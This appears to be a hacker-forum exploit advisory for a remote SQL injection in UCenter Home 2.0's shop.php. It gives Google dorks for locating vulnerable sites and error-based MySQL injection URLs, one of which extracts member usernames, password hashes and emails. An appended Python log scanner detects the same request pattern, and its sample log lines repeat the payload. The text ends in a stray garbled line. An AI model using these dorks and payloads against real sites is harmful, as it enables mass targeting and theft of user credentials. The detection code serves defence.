__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit your DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'
Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
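
Added example, not part of the original advisory: a Python log check for the request shape described above. It flags shop.php?ac=view requests whose shopid is not a plain integer and tags the MySQL error-based markers. The combined log format, the sample lines, and the rule that legitimate shopid values are integers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address, request target and status from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# SQL constructs characteristic of MySQL error-based injection.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}

def inspect_line(line):
    """Return a finding for a non-numeric shopid on shop.php?ac=view, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if params.get("ac") != ["view"]:
        return None
    shopid = " ".join(params.get("shopid", [""]))
    if re.fullmatch(r"\d{1,10}", shopid):
        return None  # assumption: a legitimate shopid is a plain integer
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(shopid))
    high = "rand_floor" in hits or "info_schema" in hits
    return {"client": client, "status": int(status), "markers": hits,
            "severity": "high" if high else "review"}

def scan(lines):
    return [f for f in map(inspect_line, lines) if f is not None]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 298',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?ac=view&shopid=abc HTTP/1.1" 404 150',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding that returned HTTP 200 is worth checking against the application's error output for that request, since error-based injection leaks data through the MySQL error message.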
" e# s2 C2 d$ l2 P* ] |